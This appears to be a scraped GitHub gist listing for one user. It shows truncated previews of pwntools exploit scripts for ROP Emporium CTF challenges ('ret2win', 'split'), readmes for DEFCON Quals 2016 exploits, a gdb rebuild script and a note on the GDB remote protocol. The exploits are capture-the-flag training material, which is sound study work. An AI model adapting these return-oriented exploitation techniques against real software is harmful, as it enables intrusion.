Skip to content

Instantly share code, notes, and snippets.

Zach Riggle zachriggle

Block or report user

Report or block zachriggle

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View RARVERSEME-README.txt
RARVM reversible/patchme
Modified 'unrar' source to dump context and disassembly.
Wrote two separate solvers since the challenge was broken.
To build the disassembler/debugger:
- unzip unrar-src-disassembler.zip -d unrar
- cd unrar
View gdb-python2.7-ubuntu.sh
apt-get install python2.7-dev python2.7
apt-get build-dep gdb
apt-get source gdb
sed -i -E "s|python3|/usr/bin/python2.7|" debian/rules
dpkg-buildpackage -uc -us -j8
dpkg-install ../*.deb
@zachriggle
zachriggle / win.py
Created Sep 1, 2017
Example Exploit for ROP Emporium's ret2win Challenge Raw
View win.py
from pwn import *
# Set up pwntools to work with this binary
elf = context.binary = ELF('ret2win')
# Enable verbose logging so we can see exactly what is being sent.
context.log_level = 'debug'
# Print out the target address
info("%#x target", elf.symbols.ret2win)
@zachriggle
zachriggle / win.py
Created Sep 25, 2017
Exploit for ROP Emporium's "split"
View win.py
from pwn import *
# Set up pwntools to work with this binary
elf = context.binary = ELF('split')
# We need to invoke system("cat flag"), which requires knowing the
# location of both the function 'system' as well as the string 'cat flag'.
system = elf.symbols.system
cat_flag = elf.search("cat flag").next()
@zachriggle
zachriggle / gdb.md
Last active Oct 25, 2017
I fucking hate you, GDB
View gdb.md

Lots of commands in GDB's protocol use hex-encoded data. A $ starts a packet, and all packets end with # followed by a one-byte, hex-encoded checksum.

Let's look at the protocol for the request:

remote get /proc/self/cmdline ./cmdline

Which should fetch /proc/self/cmdline and dump it to ./cmdline. It does!

$ phd cmdline
View keybase.md

Keybase proof

I hereby claim:

  • I am zachriggle on github.
  • I am zachriggle (https://keybase.io/zachriggle) on keybase.
  • I have a public key ASBYNpGGwzmRUnRb5-fg2Qy7jdirdXG-ECeIbGP_Lv72oQo

To claim this, I am signing this object:

View win2.py
from pwn import *
# Here's the disassembly for everything
"""
0804844b <vulnerable_function>:
804844b: 55 push ebp
804844c: 89 e5 mov ebp,esp
804844e: 81 ec 88 00 00 00 sub esp,0x88
8048454: 83 ec 04 sub esp,0x4
8048457: 68 00 01 00 00 push 0x100
View win.py
from pwn import *
# Here's the disassembly for everything
"""
0804844b <vulnerable_function>:
804844b: 55 push ebp
804844c: 89 e5 mov ebp,esp
804844e: 81 ec 88 00 00 00 sub esp,0x88
8048454: 83 ec 04 sub esp,0x4
8048457: 68 00 01 00 00 push 0x100
View README.md

DEFCON Quals 2016 Pwnable -- GladOS

The write-up is basically the exploit.

@zachriggle
zachriggle / README.md
Last active May 25, 2016
DEFCON CTF Qualifiers 2016 -- heapfun4u Exploit
View README.md

DEFCON CTF Qualifiers 2016 -- heapfun4u Exploit Write-Up

The write-up is the exploit.

Example Output

[*] './heapfun4u'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
You can’t perform that action at this time.